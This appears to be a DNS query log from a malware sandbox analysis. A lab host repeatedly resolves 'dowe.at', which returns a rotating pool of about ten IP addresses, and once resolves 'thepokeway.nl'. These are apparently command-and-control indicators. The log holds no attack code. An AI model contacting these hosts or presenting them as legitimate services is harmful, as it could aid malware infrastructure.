Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.909164906 CET | 8.8.8.8 | 192.168.2.6 | 0xf2fc | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.555744886 CET | 8.8.8.8 | 192.168.2.6 | 0xbebb | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.555744886 CET | 8.8.8.8 | 192.168.2.6 | 0xbebb | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.555744886 CET | 8.8.8.8 | 192.168.2.6 | 0xbebb | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.555744886 CET | 8.8.8.8 | 192.168.2.6 | 0xbebb | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.555744886 CET | 8.8.8.8 | 192.168.2.6 | 0xbebb | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.555744886 CET | 8.8.8.8 | 192.168.2.6 | 0xbebb | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.555744886 CET | 8.8.8.8 | 192.168.2.6 | 0xbebb | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:39.178725958 CET8.8.8.8192.168.2.60x266eNo error (0)thepokeway.nl5.135.247.111A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.970715046 CET8.8.8.8192.168.2.60xb003No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.541811943 CET8.8.8.8192.168.2.60xa796No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.526927948 CET8.8.8.8192.168.2.60xbe7eNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.144521952 CET8.8.8.8192.168.2.60xb0e8No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.991724968 CET8.8.8.8192.168.2.60xacd6No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.196737051 CET8.8.8.8192.168.2.60xa191No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.391386986 CET8.8.8.8192.168.2.60x66ccNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.630928993 CET8.8.8.8192.168.2.60xacbdNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.780193090 CET8.8.8.8192.168.2.60x4a2bNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.366202116 CET8.8.8.8192.168.2.60x293bNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.403703928 CET8.8.8.8192.168.2.60x1e39No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
